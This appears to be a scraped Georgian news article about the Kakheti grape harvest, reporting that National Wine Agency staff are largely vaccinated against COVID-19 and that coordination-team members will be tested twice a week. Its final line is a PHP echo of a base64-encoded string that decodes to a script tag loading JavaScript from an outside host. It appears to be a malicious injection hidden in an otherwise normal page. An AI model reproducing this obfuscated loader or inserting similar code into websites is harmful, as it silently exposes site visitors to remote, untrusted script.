celsiusi
ავერსი შნაიდერი
რამდენიმე დღეში, კახეთის რეგიონში რთველი დაიწყება. ქვეყანაში არსებული ეპიდემიოლოგიური ვითარების გათვალისწინებით, ღვინის ეროვნული სააგენტოს თანამშრომელთა, მათ შორის, რთველის საკოორდინაციო შტაბის წევრთა აბსოლუტური უმრავლესობა უკვე ორჯერადად ვაქცინირებულია.  
 
როგორც საინფორმაციო სააგენტო "ბიზნესთაიმს" ღვინის ეროვნული სააგენტოდან აცნობეს, რამდენიმე თანამშრომელი, რომლებსაც კორონავირუსი ახალი გადატანილი აქვთ, ექიმების რეკომენდაციით, აცრას შესაბამისი პერიოდის გასვლის შემდეგ ჩაიტარებენ. 
 
დაავადებათა კონტროლის ეროვნული ცენტრის დირექტორის, ამირან გამყრელიძის განაცხადებით, ძალიან მნიშვნელოვანია, რთველის პერიოდში, ყველა ადამიანი, რომელიც პროცესშია ჩართული, აცრილი იყოს, რადგან ამ დროს ადამიანებს შორის ინტენსიური კონტაქტია. 
 
აღნიშნულიდან გამომდინარე, ღვინის ეროვნული სააგენტო მოუწოდებს რთველის პროცესში ჩართულ ღვინის კომპანიების ხელმძღვანელებსა და თანამშრომლებს, დროულად ჩაიტარონ აცრა, რათა პანდემიის ასეთი მასშტაბის პირობებში, საკუთარ ჯანმრთელობაზე ზრუნვასთან ერთად, გაიაზრონ  პასუხისმგებლობა იმ ადამიანების წინაშე, რომლებთანაც მათ რთველის პერიოდში სისტემატური და მჭიდრო კომუნიკაცია ექნებათ.
 
საკოორდინაციო შტაბის წევრების ჯანმრთელობის მაქსიმალური დაცვისა და რთველის პროცესის შეუფერხებელი წარმართვის მიზნით, შტაბის წევრებს კვირაში ორჯერ ტესტირება ჩაუტერდებათ.
 
 
1210
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");